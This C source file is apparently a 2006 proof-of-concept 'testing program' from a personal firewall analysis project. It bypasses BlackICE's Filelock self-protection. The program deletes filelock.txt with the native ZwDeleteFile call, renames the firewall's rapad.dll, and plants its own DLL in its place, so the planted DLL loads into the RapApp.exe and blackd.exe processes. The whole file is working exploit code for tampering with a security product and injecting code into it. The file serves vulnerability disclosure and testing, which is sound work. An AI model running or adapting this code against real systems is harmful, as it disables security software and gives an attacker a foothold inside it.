/*

 Testing program for Filelock protection bypass (BTP00013P003BI)


 Usage:
 prog INSTDIR
   INSTDIR - BlackICE installation directory

 Description:
 This program uses native Windows function ZwDeleteFile to delete "filelock.txt" in BlackICE 
 installation directory. Then it renames "rapad.dll" to "rapad.dll.bug" in BlackICE installation directory
 and copies own DLL to this directory instead of original "rapad.dll". This DLL is loaded into 
 processes called "RapApp.exe" and "blackd.exe" during system startup or when the user is asked for a decision 
 by new instance of "RapApp.exe".

 Test:
 Running the testing program with a path to BlackICE installation directory as an argument,
 execution of protected action or restarting the system.

*/

#include <stdio.h>
#include <windows.h>
#include <ddk/ntapi.h>

void about(void)
{
  printf("Testing program for Filelock protection bypass (BTP00013P003BI)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2006 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/\n\n");
  return;
}

void usage(void)
{
  printf("Usage: INSTDIR\n"
         "  INSTDIR - BlackICE installation directory\n");
  return;
}

void print_last_error()
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %d\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %d.\n",code);
  return;
}


/*
 name_to_native converts classic Windows file name like "c:\test.txt"
 to native format like L"\??\c:\test.txt"
*/

PUNICODE_STRING name_to_native(char *name)
{
  char *buf=malloc(sizeof(UNICODE_STRING)+2*MAX_PATH*sizeof(wchar_t));
  if (!buf) return NULL;


  PUNICODE_STRING us=(PUNICODE_STRING)buf;
  wchar_t *usbuf=(wchar_t*)(&buf[sizeof(UNICODE_STRING)]);

  wchar_t namew[MAX_PATH];
  snwprintf(namew,MAX_PATH,L"%S",name);

  us->Length=0;
  us->MaximumLength=2*MAX_PATH;
  us->Buffer=usbuf;
  
  if (RtlDosPathNameToNtPathName_U(namew,us,NULL,NULL)) return us;
  else return NULL;
}


int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  char curdir[MAX_PATH],sysdir[MAX_PATH],filelock[MAX_PATH],testdll[MAX_PATH],rapad[MAX_PATH],rapad_new[MAX_PATH];
  GetCurrentDirectory(MAX_PATH,curdir);
  GetSystemDirectory(sysdir,MAX_PATH);
  int curdirlen=strlen(curdir)-1;
  if (curdir[curdirlen]=='\\') curdir[curdirlen]='\0';


  int err=0;
  snprintf(filelock,MAX_PATH,"%s\\filelock.txt",argv[1]);
  PUNICODE_STRING ntname=name_to_native(filelock);
  if (ntname)
  {
    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa,ntname,0,0,NULL);
    NTSTATUS status=ZwDeleteFile(&oa);
    if (NT_SUCCESS(status))
    {
      printf("\"%s\" deleted.\n",filelock);
      snprintf(testdll,MAX_PATH,"%s\\testdll.dll",curdir);
      snprintf(rapad,MAX_PATH,"%s\\rapad.dll",argv[1]);
      snprintf(rapad_new,MAX_PATH,"%s\\rapad.dll.bug",argv[1]);

      if (MoveFileEx(rapad,rapad_new,MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))
      {
        printf("File \"%s\" moved to \"%s\".\n",rapad,rapad_new);

        if (!CopyFile(testdll,rapad,FALSE))
        {
          fprintf(stderr,"Unable to move file \"%s\" to \"%s\".\n",testdll,rapad);
          err=1;
        } else printf("File \"%s\" copied to \"%s\".\n",testdll,rapad);
      } else
      {
        fprintf(stderr,"Unable to move file \"%s\" to \"%s\".\n",rapad,rapad_new);
        err=1;
      }
    } else
    {
      fprintf(stderr,"Unable to delete file \"%s\" using ZwDeleteFile, error status was 0x%X.\n",filelock,status);
      err=2;
    }
    free(ntname);
  }

  if (err)
  {
    if (err==1)
    {
      print_last_error();
      fprintf(stderr,"\n");
    }
    printf("\nTEST FAILED!\n");
    return 1;
  }

  printf("\nTEST SUCCESSFUL!\n");
  return 0;
}
